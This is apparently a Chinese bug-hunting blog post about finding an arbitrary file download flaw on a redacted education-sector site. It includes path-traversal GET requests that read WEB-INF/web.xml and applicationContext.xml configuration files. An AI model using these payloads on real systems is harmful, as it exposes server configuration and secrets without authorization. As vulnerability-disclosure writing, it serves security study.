您的位置 首页 网络安全

从零开始挖edusrc(三)-任意文件下载

和上篇文章一个站点从零开始挖edusrc(二)-任意用户密码重置 https://xxxxxxxxx/NECB…

和上篇文章一个站点从零开始挖edusrc(二)-任意用户密码重置

https://xxxxxxxxx/NECBSHistory/downloadFileByName?fileName=uploadNEFormAttachPictureWord_7290bb66-4c60-41fc-b701-4940b8560491.jsp&propertyName=uploadNEFormAttachPictureWord

上传文件会解析下载

downloadFileByName?fileName=uploadNEFormAttachPictureWord_7290bb66-4c60-41fc-b701-4940b8560491.jsp
明显的文件下载链接,可能存在任意文件下载:
比如:
GET /NECBSHistory/downloadFileByName?fileName=./../../../../WEB-INF/web.xml&propertyName=uploadNEFormConsignerDataWord

GET /NECBSHistory/downloadFileByName?fileName=./../../../../WEB-INF/classes/config/applicationContext.xml&propertyName=uploadNEFormConsignerDataWord HTTP/1.1

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/383/
小小小月球

作者: 小小小月球

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部